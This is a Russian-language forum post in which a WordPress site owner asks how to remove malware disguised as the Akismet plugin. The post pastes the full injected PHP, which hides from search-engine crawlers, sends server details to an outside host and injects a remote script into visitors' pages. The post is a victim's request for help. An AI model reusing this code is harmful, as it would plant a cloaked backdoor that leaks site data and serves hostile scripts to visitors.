Добрый вечер. который день не могу побороть вирус который маскируется под акисмет. Вирус вставляет на сайт ссылки на другие зараженные файлы на других сайта. код он ставит только в шаблоны home.php и header.php тем сайта.
<?php
#515904#
/**
* @package Akismet
*/
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
if( empty( $dhg ) ) {
if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
"/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
$_SERVER['HTTP_USER_AGENT']
)
) {
} else {
error_reporting( 0 );
@ini_set( 'display_errors', 0 );
if( !function_exists( '__url_get_contents' ) ) {
function __url_get_contents( $remote_url, $timeout )
{
if( function_exists( 'curl_exec' ) ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $remote_url );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
$_url_get_contents_data = curl_exec( $ch );
curl_close( $ch );
} elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
$ctx = @stream_context_create(
array(
'http' =>
array(
'timeout' => $timeout,
)
)
);
$_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
} elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
$handle = fopen( $remote_url, "r" );
$_url_get_contents_data = @stream_get_contents( $handle );
} else {
$_url_get_contents_data = __file_get_url_contents( $remote_url );
}
return $_url_get_contents_data;
}
}
if( !function_exists( '__file_get_url_contents' ) ) {
function __file_get_url_contents( $remote_url )
{
if( preg_match(
'/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
$remote_url,
$matches
)
) {
$protocol = strtolower( $matches[1] );
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return false;
}
if( $protocol == "http" ) {
$socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
} else {
// Bad protocol
return false;
}
if( !$socket ) {
// Error creating socket
return false;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite( $socket, $request );
if( $len_written === false || $len_written != strlen( $request ) ) {
// Error sending request
return false;
}
$response = "";
while( !@feof( $socket ) &&
( $buf = @fread( $socket, 4096 ) ) !== false ) {
$response .= $buf;
}
if( $buf === false ) {
// Error reading response
return false;
}
$end_of_header = strpos( $response, "\r\n\r\n" );
return substr( $response, $end_of_header + 4 );
}
}
$dhg['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$dhg['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$dhg['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
$dhg['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
$dhg['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
$dhg['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
$dhg['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];
$dhg = __url_get_contents("http://akvabest.ru/lightbox/js/rwypp9yz.php" . "?fid=295595&info=" . http_build_query( $dhg ) . "&no=1", 1);
echo "<script type=\"text/javascript\" src=\"http://akvabest.ru/lightbox/js/rwypp9yz.php?id=4368473\"></script>";
}
}
#/515904#
?>
Ставил у header.php права 400 от имени пользователя хостинга, не помогла.файл был успешно изменен и код внедрен. пример кода внедрения выше.
Прогонял сайт ai-bolit.php ничего он не нашел
заражению подвергаются все сайты на WP на хостинге. Хостинг reg.ru.
подскажите как побороть?
Средний
Простой